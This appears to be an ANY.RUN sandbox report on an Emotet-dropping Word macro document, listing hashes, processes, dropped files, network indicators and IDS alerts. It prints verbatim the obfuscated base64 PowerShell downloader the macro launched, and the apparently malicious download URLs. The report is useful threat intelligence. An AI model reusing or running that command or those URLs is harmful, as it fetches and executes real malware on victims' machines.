analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
download:

kbw7-6j5qw8-nvjphhk

Full analysis: https://app.any.run/tasks/9e758c4b-7888-4845-98fc-a1ed891b8267
Verdict: Malicious activity
Threats:

Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns.

Analysis date: March 14, 2019, 11:11:54
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
macros
macros-on-open
generated-doc
loader
emotet
emotet-doc
Indicators:
MIME: application/msword
File info: Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Thu Mar 14 09:03:00 2019, Last Saved Time/Date: Thu Mar 14 09:03:00 2019, Number of Pages: 1, Number of Words: 1, Number of Characters: 10, Security: 0
MD5:

3CD2C3ACB48AA86897E4DDE68B8FB503

SHA1:

96A89AB63932A5893196BB541FF83E33F042DEC6

SHA256:

55E71B4C09811FE80C49E2EF13F2BBC994EE2A664B19BAF0E10B4E05CDA923B1

SSDEEP:

6144:T77HUUUUUUUUUUUUUUUUUUUT52VMqiruEPRDLneFyn816Wwv5:T77HUUUUUUUUUUUUUUUUUUUTCouEPRDb

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Application was dropped or rewritten from another process

      • 746.exe (PID: 3104)
      • 746.exe (PID: 2148)
      • wabmetagen.exe (PID: 3580)
      • wabmetagen.exe (PID: 2268)
    • Downloads executable files from the Internet

      • powershell.exe (PID: 3372)
    • Emotet process was detected

      • wabmetagen.exe (PID: 3580)
  • SUSPICIOUS

    • Creates files in the user directory

      • powershell.exe (PID: 3372)
    • Executable content was dropped or overwritten

      • powershell.exe (PID: 3372)
      • 746.exe (PID: 2148)
    • Application launched itself

      • 746.exe (PID: 3104)
      • wabmetagen.exe (PID: 3580)
    • Starts itself from another location

      • 746.exe (PID: 2148)
  • INFO

    • Creates files in the user directory

      • WINWORD.EXE (PID: 2824)
    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 2824)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.doc | Microsoft Word document (54.2)
.doc | Microsoft Word document (old ver.) (32.2)

EXIF

FlashPix

CompObjUserType: Microsoft Word 97-2003 Document
CompObjUserTypeLen: 32
HeadingPairs:
  • Title
  • 1
TitleOfParts: -
HyperlinksChanged: No
SharedDoc: No
LinksUpToDate: No
ScaleCrop: No
AppVersion: 16
CharCountWithSpaces: 10
Paragraphs: 1
Lines: 1
Company: -
CodePage: Windows Latin 1 (Western European)
Security: None
Characters: 10
Words: 1
Pages: 1
ModifyDate: 2019:03:14 09:03:00
CreateDate: 2019:03:14 09:03:00
TotalEditTime: -
Software: Microsoft Office Word
RevisionNumber: 1
LastModifiedBy: -
Template: Normal.dotm
Comments: -
Keywords: -
Author: -
Subject: -
Title: -
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
38
Monitored processes
6
Malicious processes
4
Suspicious processes
0

Behavior graph

Click at the process to see the details
start drop and start drop and start winword.exe no specs powershell.exe 746.exe no specs 746.exe #EMOTET wabmetagen.exe no specs wabmetagen.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
2824"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\kbw7-6j5qw8-nvjphhk.doc"C:\Program Files\Microsoft Office\Office14\WINWORD.EXEexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Version:
14.0.6024.1000
3372powershell -e IAAoAE4ARQB3AC0AbwBCAGoAZQBDAHQAIAAgAHMAeQBTAFQARQBNAC4ASQBPAC4AQwBPAG0AcAByAEUAUwBTAGkATwBOAC4AZABlAGYATABhAFQARQBzAFQAUgBFAEEAbQAoAFsAUwBZAHMAVABFAG0ALgBpAE8ALgBtAGUATQBvAHIAeQBzAHQAUgBFAEEATQBdAFsAQwBvAE4AVgBlAHIAVABdADoAOgBGAFIAbwBNAGIAYQBzAGUANgA0AHMAVAByAEkAbgBHACgAIAAoACcAVgBaAEoAJwArACcAaABhACcAKwAnADkAcwB3AEUAJwArACcASQBiAC8AaQBqADQAWQBsAEoARABaAG4AawBmACcAKwAnAFkAbwBNAGIAUQBTADgASgBFAG8ATwAyAFcAZABkADQAOABNAHcAJwArACcAaQB5ACcAKwAnAGYASQBrADEAMgBaAEoAJwArACcAbgBLACcAKwAnADMAJwArACcAWABYACcAKwAnAGsAUAA5AGUAJwArACcASgAnACsAJwBTACcAKwAnAFEAJwArACcAcAAnACsAJwBPAC8AVABsAHUATwBmAHUAZgAnACsAJwBYAG0AJwArACcAUgBkAHcAJwArACcALwByACcAKwAnADEATwBSACcAKwAnAFIAUQByACcAKwAnACsAegBTACcAKwAnAEEAdwBLAGcATQBhACcAKwAnAGUAegAnACsAJwBGAGMAcwBaACcAKwAnAHcAbwBTACcAKwAnAGoAWQBOAHYAaQAnACsAJwBqADgAbwBMACcAKwAnAEgAJwArACcAbABBAEcAJwArACcALwB6AEUAWQBsACcAKwAnADUAJwArACcATAAxAEQAYgAnACsAJwAyAGYAbQBVAHoAJwArACcAaQBBAEIAbQAnACsAJwBDAGEAJwArACcAMgBzAGIAZgB1AGIAJwArACcATQBPAHcAYgBkACcAKwAnAEsAKwBVACcAKwAnAFAAJwArACcAQgBDAG0AJwArACcAQwBZACcAKwAnAGYAVwAnACsAJwBsADEAcgBVAHUAeABMADcAJwArACcAcwBGAFQAJwArACcAaAA3ACcAKwAnAFkAVwB5ACcAKwAnAG4AUwB4ADIAWABIAE8AZgBZADIAZgA2AGwAJwArACcAZwBzADgANAAnACsAJwArAEgAZgBEAC8AZABmADMAJwArACcANwBpACcAKwAnAFcAOQAnACsAJwA5AEoAJwArACcAbwBZAGIAUwAnACsAJwBWADIAZwBuACcAKwAnAHkAJwArACcAKwBvAEkAJwArACcAMQAnACsAJwA3AEUAdwBkAEoAUwAnACsAJwB2ACcAKwAnAGMAJwArACcAbABLAGEAJwArACcAUgBwADUAbQBzAHUAJwArACcAbQBJAG4ANgAvAEwAJwArACcAVQBhAEgAbAAzAHAAYgAnACsAJwBaAG8AdQBpADAAcQAnACsAJwAyACcAKwAnAFcATgAzAG0AbABuAHMAYgBmAGoATgBoAGoAJwArACcAUgA0AGIARwB0ACcAKwAnAHAAUgAvAFMAVwAnACsAJwBqAG0AUAB2AEQAZwBTACcAKwAnAGsAJwArACcARwBVAEIAQwBIACcAKwAnACsAJwArACcAZgBBAHMAcwB6ACcAKwAnAEYAOAAnACsAJwBNAEwAQQAnACsAJwBBAEoAJwArACcAQwBFADAARQAvAFQAJwArACcAagA2ACcAKwAnADQAdgAnACsAJwA4AGcAaQBHACcAKwAnAE4AJwArACcARgBvAGwAVgBJAEIAJwArACcASwBJACcAKwAnAFYAbwBkAHMAJwArACcALwBvACcAKwAnAGgAWgBwAEMAdAAnACsAJwA1ACcAKwAnAG8AbQBIACsAdQBsACcAKwAnAG0AJwArACcANQB6AFQAYQB6AG0AeABrAGoAUgAnACsAJwBQACcAKwAnADYAJwArACcAbQAwACcAKwAnADcATwBKAHkAWQAwAHcARwBlAGsAOABjAFoAJwArACcAMAAnACsAJwB5ACcAKwAnAEUAVQAxACcAKwAnADgAbABLADMAQQBpAG0AUgBtAGwAeQBEAEgATwA5AHQAOQAnACsAJwAyADkALwBqACcAKwAnAFQANQBZAG0ARQAnACsAJwBIAFgAaAAnACsAJwBwACcAKwAnAGUAZgAzAGEAJwArACcAMwBMAHcAagB0AHkAJwArACcAawBYAE8ARwB1AFEATAAxAFAASABYADUAQQA2AFQAJwArACcAcgB4AFUARABqADUAWQBhAE0AUgAnACsAJwBnAHkAdAB2ACcAKwAnADcAVABZACcAKwAnAHYAJwArACcASgBGAEIAagAnACsAJwBYAHAAcgAnACsAJwBLACsAJwArACcASgB2ACcAKwAnAGsAVQB6AGYAdQB4AHEAVAAvAFYASQAnACsAJwAvAEcAJwArACcAWQBYAC8AJwArACcAZwAnACsAJwA3AEcAWABRADYAJwArACcAcQBBAFIAZQA3AG0AJwArACcAdwAzACcAKwAnAG8AQgAnACsAJwB4ADUAOQAnACsAJwBRAE8AJwArACcATAAnACsAJwA4AHEAUABoACcAKwAnAHcARQB0ACcAKwAnADYATABhAEgAdwA3AE8AaAA2ACcAKwAnAHQANQBRAHIAOAAnACsAJwB3AHkARwAnACsAJwBCAE4AJwArACcANAAnACsAJwAxAGMAPQAnACkAKQAgACwAWwBzAHkAcwBUAEUAbQAuAGkAbwAuAGMAbwBtAFAAcgBlAFMAcwBJAG8ATgAuAGMAbwBtAHAAUgBlAFMAcwBJAG8AbgBNAG8AZABlAF0AOgA6AGQAZQBDAE8AbQBQAFIAZQBzAHMAIAApAHwAJQB7AE4ARQB3AC0AbwBCAGoAZQBDAHQAIABzAHkAcwB0AEUATQAuAGkAbwAuAHMAVABSAEUAQQBtAHIARQBBAEQAZQBSACgAIAAkAF8ALABbAHQARQBYAHQALgBFAG4AYwBPAGQAaQBOAEcAXQA6ADoAYQBTAGMAaQBpACAAKQB9AHwAJQB7ACAAJABfAC4AcgBlAEEARABUAE8ARQBOAGQAKAApACAAfQApAHwAJgAoACAAKABbAHMAdAByAGkATgBHAF0AJAB2AGUAUgBiAE8AUwBFAFAAUgBFAGYARQBSAEUAbgBDAGUAKQBbADEALAAzAF0AKwAnAFgAJwAtAEoAbwBJAG4AJwAnACkAC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
wmiprvse.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
3104"C:\Users\admin\746.exe" C:\Users\admin\746.exepowershell.exe
User:
admin
Company:
Tonec Inc.
Integrity Level:
MEDIUM
Description:
Internet Download Manager agent for click monitoring in IE-based browsers
Exit code:
0
Version:
6, 22, 1, 1
2148"C:\Users\admin\746.exe"C:\Users\admin\746.exe
746.exe
User:
admin
Company:
Tonec Inc.
Integrity Level:
MEDIUM
Description:
Internet Download Manager agent for click monitoring in IE-based browsers
Exit code:
0
Version:
6, 22, 1, 1
3580"C:\Users\admin\AppData\Local\wabmetagen\wabmetagen.exe"C:\Users\admin\AppData\Local\wabmetagen\wabmetagen.exe
746.exe
User:
admin
Company:
Tonec Inc.
Integrity Level:
MEDIUM
Description:
Internet Download Manager agent for click monitoring in IE-based browsers
Exit code:
0
Version:
6, 22, 1, 1
2268"C:\Users\admin\AppData\Local\wabmetagen\wabmetagen.exe"C:\Users\admin\AppData\Local\wabmetagen\wabmetagen.exewabmetagen.exe
User:
admin
Company:
Tonec Inc.
Integrity Level:
MEDIUM
Description:
Internet Download Manager agent for click monitoring in IE-based browsers
Version:
6, 22, 1, 1
Total events
1 664
Read events
1 255
Write events
0
Delete events
0

Modification events

No data
Executable files
2
Suspicious files
2
Text files
0
Unknown types
2

Dropped files

PID
Process
Filename
Type
2824WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVR7ECB.tmp.cvr
MD5:
SHA256:
3372powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\EE0Q5AN71F1MMG5XER6L.temp
MD5:
SHA256:
2148746.exeC:\Users\admin\AppData\Local\wabmetagen\wabmetagen.exeexecutable
MD5:2949907295CA8D0DCDA3FADE0CC8A0BF
SHA256:7F3C83AC5CA91FD8A71BEFC76C0FC25C7F8AC3063141716B7A1DBD650B688492
2824WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotmpgc
MD5:A45EB704483E0EB1916FB65832D39E0D
SHA256:525B8EF4563638DDE742038C1CF6F23D020B7E7FB834DD8F4EE8E2464F18740D
3372powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-msbinary
MD5:901ECDF767744E6BB59CB023757886E3
SHA256:48A990A7B1201BFD70F417698302A6299D036A6574E558A96000AF48469479E1
3372powershell.exeC:\Users\admin\746.exeexecutable
MD5:2949907295CA8D0DCDA3FADE0CC8A0BF
SHA256:7F3C83AC5CA91FD8A71BEFC76C0FC25C7F8AC3063141716B7A1DBD650B688492
2824WINWORD.EXEC:\Users\admin\AppData\Local\Temp\~$w7-6j5qw8-nvjphhk.docpgc
MD5:FA51EEFA91E31893E72146C5D8F81452
SHA256:CDB338940181DCDA09AC274C22275BE7DF4F644550B1AD90FE2FD56091A517D4
3372powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF198bcb.TMPbinary
MD5:901ECDF767744E6BB59CB023757886E3
SHA256:48A990A7B1201BFD70F417698302A6299D036A6574E558A96000AF48469479E1
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
1
TCP/UDP connections
5
DNS requests
4
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
3372
powershell.exe
GET
200
173.230.251.210:80
http://shefdomi.com/ihrbuild.com/niL/
US
executable
221 Kb
suspicious
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
3372
powershell.exe
38.123.253.66:443
smesmedia.com
Cogent Communications
US
unknown
3372
powershell.exe
190.210.176.190:443
pasioncontinental.com
NSS S.A.
AR
suspicious
3372
powershell.exe
103.31.250.67:443
tribuana-aerospace.com
Argon Data Communication
ID
suspicious
3372
powershell.exe
173.230.251.210:80
shefdomi.com
ACENET, INC.
US
suspicious

DNS requests

Domain
IP
Reputation
smesmedia.com
  • 38.123.253.66
unknown
tribuana-aerospace.com
  • 103.31.250.67
suspicious
pasioncontinental.com
  • 190.210.176.190
suspicious
shefdomi.com
  • 173.230.251.210
suspicious

Threats

PID
Process
Class
Message
3372
powershell.exe
Potential Corporate Privacy Violation
ET POLICY PE EXE or DLL Windows file download HTTP
3372
powershell.exe
Potentially Bad Traffic
ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download
3372
powershell.exe
Misc activity
ET INFO EXE - Served Attached HTTP
No debug info